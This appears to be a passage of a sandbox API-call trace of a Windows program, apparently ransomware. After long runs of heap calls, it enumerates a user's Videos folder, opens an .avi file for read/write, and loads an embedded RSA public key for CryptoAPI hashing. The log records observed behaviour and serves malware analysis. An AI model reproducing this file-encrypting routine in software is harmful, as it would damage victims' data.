hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.537] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\") returned="htWDnwTyY\\" [0197.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0197.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.538] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\") returned="F72Mw_KNQRugYJJCcBc\\" [0197.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0197.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0197.539] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0197.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0197.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.539] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0197.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d2c8 [0197.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.539] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0197.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d2c8 | out: hHeap=0x6a0000) returned 1 [0197.540] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.540] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.541] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.541] PathFindFileNameW (pszPath="") returned="" [0197.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.541] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2add8e80, ftCreationTime.dwHighDateTime=0x1d8a6a4, ftLastAccessTime.dwLowDateTime=0x268f99e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e0, ftLastWriteTime.dwLowDateTime=0x268f99e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0197.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0197.542] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2add8e80, ftCreationTime.dwHighDateTime=0x1d8a6a4, ftLastAccessTime.dwLowDateTime=0x268f99e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e0, ftLastWriteTime.dwLowDateTime=0x268f99e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.542] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d015d0, ftCreationTime.dwHighDateTime=0x1d89b97, ftLastAccessTime.dwLowDateTime=0x25b47b40, ftLastAccessTime.dwHighDateTime=0x1d89b9f, ftLastWriteTime.dwLowDateTime=0x25b47b40, ftLastWriteTime.dwHighDateTime=0x1d89b9f, nFileSizeHigh=0x0, nFileSizeLow=0xb7f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="irICFx-m5Bn.avi", cAlternateFileName="IRICFX~1.AVI")) returned 1 [0197.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.543] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\irICFx-m5Bn.avi") returned=".avi" [0197.543] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\irICFx-m5Bn.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\iricfx-m5bn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.543] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=47097) returned 1 [0197.543] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.546] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xb7d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.546] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.548] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.548] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xb7f9, lpOverlapped=0x0) returned 1 [0197.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.549] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.549] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.550] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.550] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.550] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.550] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.550] GetLastError () returned 0x0 [0197.550] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.550] CryptReleaseContext 